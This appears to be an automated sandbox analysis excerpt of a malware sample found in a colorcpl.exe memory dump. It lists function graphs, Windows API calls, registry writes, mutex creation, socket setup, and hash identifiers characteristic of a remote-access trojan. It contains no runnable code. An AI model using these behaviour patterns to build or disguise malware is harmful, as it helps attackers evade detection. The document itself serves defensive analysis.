                                                                            control_flow_graph 1190 4664f51-4664f5f 1191 4664f65-4664f6c 1190->1191 1192 4664fea 1190->1192 1194 4664f74-4664f7b 1191->1194 1195 4664f6e-4664f72 1191->1195 1193 4664fec-4664ff1 1192->1193 1196 4664fc0-4664fe8 CreateEventA CreateThread 1194->1196 1197 4664f7d-4664fbb GetLocalTime call 467bc1f call 46652fd call 4662093 call 467b580 call 4661fd8 1194->1197 1195->1196 1196->1193 1197->1196
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 04664F81
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04664FCD
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 04664FE0
                                                                            Strings
                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 04664F94
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$EventLocalThreadTime
                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                            • API String ID: 2532271599-1507639952
                                                                            • Opcode ID: c2d1457fad819644e11fd101f0b0e774cac5edd76ee7620a4cfcae67fe653250
                                                                            • Instruction ID: eab6ddc4eeaef5ae75d669dc634532c5f86029d3b695e4c6b18734c4d4b836e1
                                                                            • Opcode Fuzzy Hash: c2d1457fad819644e11fd101f0b0e774cac5edd76ee7620a4cfcae67fe653250
                                                                            • Instruction Fuzzy Hash: 0911A3719102847AEB20AAB6980DEABBFACDBD6718F04014EE44352240FAB4B445CBA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 1207 46737aa-46737c1 RegCreateKeyA 1208 46737c3-46737f8 call 466247c call 4661fab RegSetValueExA RegCloseKey 1207->1208 1209 46737fa 1207->1209 1211 46737fc-467380a call 4661fd8 1208->1211 1209->1211
                                                                            APIs
                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 046737B9
                                                                            • RegSetValueExA.KERNEL32(?,046C74C8,00000000,?,00000000,00000000,046D52F0,?,?,0466F88E,046C74C8,5.1.2 Pro), ref: 046737E1
                                                                            • RegCloseKey.ADVAPI32(?,?,?,0466F88E,046C74C8,5.1.2 Pro), ref: 046737EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID: pth_unenc
                                                                            • API String ID: 1818849710-4028850238

                                                                            Control-flow Graph: blocks 46a39aa-46a3aa3; internal calls to 46a5b74, 46a7be1, 46a3aa4, 46a6802 and 469bd68, no imported APIs
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0

                                                                            Control-flow Graph: blocks 46735e1-4673655; RegOpenKeyExA, then RegQueryValueExA and RegCloseKey on success, joining at the 4662093 call
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 04673605
                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04673622
                                                                            • RegCloseKey.KERNEL32(?), ref: 0467362D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,046D52F0), ref: 0467374F
                                                                            • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 04673768
                                                                            • RegCloseKey.KERNEL32(00000000), ref: 04673773
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 046735A4
                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 046735C2
                                                                            • RegCloseKey.KERNEL32(?), ref: 046735CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0466C1D7,046C6C58), ref: 04673551
                                                                            • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0466C1D7,046C6C58), ref: 04673565
                                                                            • RegCloseKey.KERNEL32(?,?,?,0466C1D7,046C6C58), ref: 04673570
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            APIs
                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,046C60B4), ref: 046738C0
                                                                            • RegSetValueExA.KERNEL32(046C60B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0466C18D,046C6C58,00000001,000000AF,046C60B4), ref: 046738DB
                                                                            • RegCloseKey.ADVAPI32(046C60B4,?,?,?,0466C18D,046C6C58,00000001,000000AF,046C60B4), ref: 046738E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            APIs
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0467B85B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: GlobalMemoryStatus
                                                                            • String ID: @
                                                                            • API String ID: 1890195054-2766056989
                                                                            APIs
                                                                            • socket.WS2_32(?,00000001,00000006), ref: 04664852
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0466530B,?,?,?,00000000,0466D2DD,?,?,?,?,0466522E), ref: 0466488E
                                                                              • Part of subcall function 0466489E: WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEventStartupsocket
                                                                            • String ID:
                                                                            • API String ID: 1953588214-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            APIs
                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,046D2ADC,046D50E4,00000000,046751C3,00000000,00000001), ref: 04674F46
                                                                            • WSASetLastError.WS2_32(00000000), ref: 04674F4B
                                                                              • Part of subcall function 04674DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04674E10
                                                                              • Part of subcall function 04674DC1: LoadLibraryA.KERNEL32(?), ref: 04674E52
                                                                              • Part of subcall function 04674DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674E72
                                                                              • Part of subcall function 04674DC1: FreeLibrary.KERNEL32(00000000), ref: 04674E79
                                                                              • Part of subcall function 04674DC1: LoadLibraryA.KERNEL32(?), ref: 04674EB1
                                                                              • Part of subcall function 04674DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04674EC3
                                                                              • Part of subcall function 04674DC1: FreeLibrary.KERNEL32(00000000), ref: 04674ECA
                                                                              • Part of subcall function 04674DC1: GetProcAddress.KERNEL32(00000000,?), ref: 04674ED9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                            • String ID:
                                                                            • API String ID: 1170566393-0
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,0466EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,046C60CC,00000003,00000000), ref: 0466D0B3
                                                                            • GetLastError.KERNEL32 ref: 0466D0BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorLastMutex
                                                                            • String ID:
                                                                            • API String ID: 1925916568-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID:
                                                                            • API String ID: 176396367-0
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,04695349,?,?,046988C7,?,?,pth_unenc,?,?,0466DE9D,04695349,?,?,?,?), ref: 046A61EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Startup
                                                                            • String ID:
                                                                            • API String ID: 724789610-0
                                                                            • Opcode ID: b881b6dadf6f5c751fcb871ec22819b9f167e2913d19a34b3a8e3692d29c0b59
                                                                            • Instruction ID: 4ac57fc2e46239b6199aebc55ff9f6316abd25f0ec02527b2fc509abd5e41ada
                                                                            • Opcode Fuzzy Hash: b881b6dadf6f5c751fcb871ec22819b9f167e2913d19a34b3a8e3692d29c0b59
                                                                            • Instruction Fuzzy Hash: CBD0127295960C4EE720A9B4A80F8A5775CC316615F0407AB6DB5836C2F6481B1CC2E7